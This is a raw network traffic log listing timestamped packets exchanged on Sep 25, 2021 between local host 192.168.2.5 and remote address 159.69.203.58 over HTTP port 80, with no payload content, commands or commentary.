Sep 25, 2021 10:15:03.698692083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698709965 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698735952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698764086 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698824883 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698828936 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698843002 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698847055 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698868036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698895931 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698928118 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698955059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698981047 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.699683905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.699708939 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.699712038 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700097084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700124025 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700145006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700166941 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700185061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700201035 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700221062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700238943 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700254917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700272083 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700292110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700313091 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700330973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700346947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700370073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700375080 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700395107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700397015 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700417042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700438976 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700463057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700478077 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700485945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700504065 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700520992 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700537920 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700553894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700568914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700586081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700598001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700613022 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700614929 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700623989 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700901985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700905085 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.700936079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700968981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.700993061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701014996 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701036930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701060057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701082945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701106071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701128006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701145887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701153994 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701154947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701179028 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701200962 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701220036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701237917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701257944 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701275110 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701278925 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701292038 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701306105 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701330900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701353073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701375008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701397896 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701409101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701427937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701452017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701473951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701500893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701524019 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701550961 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701572895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701595068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701617956 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701627970 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701636076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701643944 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701667070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701689005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701710939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701733112 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701755047 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701766014 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701769114 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701777935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701806068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701833010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701858044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701879978 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701901913 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701921940 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701926947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701929092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.701951027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.701975107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.702001095 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.702025890 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.702027082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.702033043 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.702140093 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.702147007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722132921 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722183943 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722214937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722245932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722250938 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722275019 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722285032 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722296953 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722305059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722306967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722320080 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722337961 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722368002 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722368002 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722397089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722420931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722430944 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722430944 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722438097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722465992 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722491026 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722495079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722523928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722551107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722573996 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722579956 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722587109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722594023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722604036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722609997 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722639084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722662926 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722671032 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722673893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722704887 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722733021 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722732067 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722747087 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722754955 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722764015 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722789049 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722798109 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722829103 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722851992 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722857952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722862005 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722889900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722918987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722927094 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722927094 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722960949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722985983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.722990036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.722992897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723020077 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723048925 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723069906 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723078966 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723083019 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723090887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723102093 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723131895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723150969 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723170996 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723201990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723238945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723274946 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723305941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723309040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723318100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723324060 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723329067 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723332882 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723345041 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723357916 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723380089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723401070 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723413944 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723448038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723478079 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723481894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723488092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723495007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723520994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723536968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723558903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723592043 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723614931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723624945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723633051 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723639011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723665953 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723700047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723704100 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723738909 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723771095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723773003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723782063 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723788023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723810911 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723828077 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723849058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723881006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723905087 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723915100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723915100 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723949909 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.723975897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.723984003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724020004 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724026918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724036932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724042892 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724056005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724092007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724097013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724133015 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724168062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724176884 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724204063 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724226952 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724236012 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724241018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724241972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724275112 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724298000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724308968 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724312067 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724343061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724358082 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724380970 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724394083 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724401951 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724416971 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724431992 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724440098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724455118 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724473000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724490881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724525928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724539042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724560976 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724569082 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724586010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724596977 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724632978 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724637985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724647045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724670887 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724705935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724723101 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724735975 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724742889 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724766970 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724777937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724793911 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724814892 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724849939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724873066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724883080 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724884033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724919081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724920988 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724956036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.724962950 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724972010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.724992990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725011110 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725027084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725060940 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725084066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725092888 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725095987 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725128889 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725151062 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725157976 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725162983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725198030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725236893 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725260973 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725272894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725291967 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725306034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725307941 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725313902 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725342989 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725357056 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725377083 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725409985 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725423098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725433111 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725444078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725476980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725498915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725507021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725516081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725552082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725575924 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725584984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725585938 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725621939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725651979 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725655079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725666046 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725673914 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725687027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725718021 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725718975 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725737095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725750923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725789070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725816011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725826025 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725826025 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725831985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725857973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725883007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.725888014 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725919008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.725941896 CEST	49744	80	192.168.2.5	159.69.203.58
